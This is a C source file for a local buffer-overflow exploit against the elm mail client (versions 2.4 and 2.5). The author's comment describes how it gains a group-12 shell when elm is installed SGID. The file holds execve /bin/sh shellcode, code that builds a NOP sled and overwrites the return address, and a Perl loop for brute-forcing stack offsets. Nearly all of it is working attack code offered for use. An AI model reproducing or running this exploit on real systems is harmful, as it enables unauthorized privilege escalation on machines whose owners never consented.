/* (linux)elm[2.4/2.5(last time)] buffer overflow, by v9[v9@fakehalo.org]. this will give you a gid=12 shell if /usr/bin/elm is SGID(=2755). this is the last exploit i will make for elm, i swear... at least until the next version of elm. :) [the third and last installment of my elm bof trilogy. :)] i doubt anyone will(should) use elm after all of the holes that i and others have found. i liked this one because the buffersize is the same on both elm 2.4(PL25) and elm 2.5(PL3). so, just run through the offsets. note: just one more character and it would have overflowed in strcpy(esi), making it a pain in the ass. but i had an exact four character margin to work with at 260 characters(+4), i couldn't of asked for anything more perfect. :) (eip) offsets(roughly) used on my box(slack3.6), another slackware box and a redhat box. -300--500 worked on both 2.4/2.5, so it's default: 2.4(PL25): -300--500, 1000-1200. 2.5(PL3): -300--500, 1400-1600, 3400. here is a quick perl script to run offsets (until ctrl-c): #!/usr/bin/perl $i=$ARGV[0]; while(1){ print "offset: $i.\n"; system("./elm_last $i"); $i++; # or $i+=100; if you want to be speedy. (which you do, again) } */ #define DEFAULT_OFFSET -400 static char exec[]= "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88" "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb" "\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; long esp(void){__asm__("movl %esp,%eax");} int main(int argc,char **argv){ char bof[264]; int i,offset; long ret; if(argc>1){offset=atoi(argv[1]);} else{offset=DEFAULT_OFFSET;} ret=(esp()-offset); printf("return address: 0x%lx, offset: %d.\nif this is elm2.4 you will need to run \"reset\" to reset your terminal.\n",ret,offset); for(i=0;i<264;i+=4){*(long *)&bof[i]=ret;} for(i=0;i<(260-strlen(exec));i++){*(bof+i)=0x90;} memcpy(bof+i,exec,strlen(exec)); execlp("/usr/bin/elm","elm","-f",bof,0); }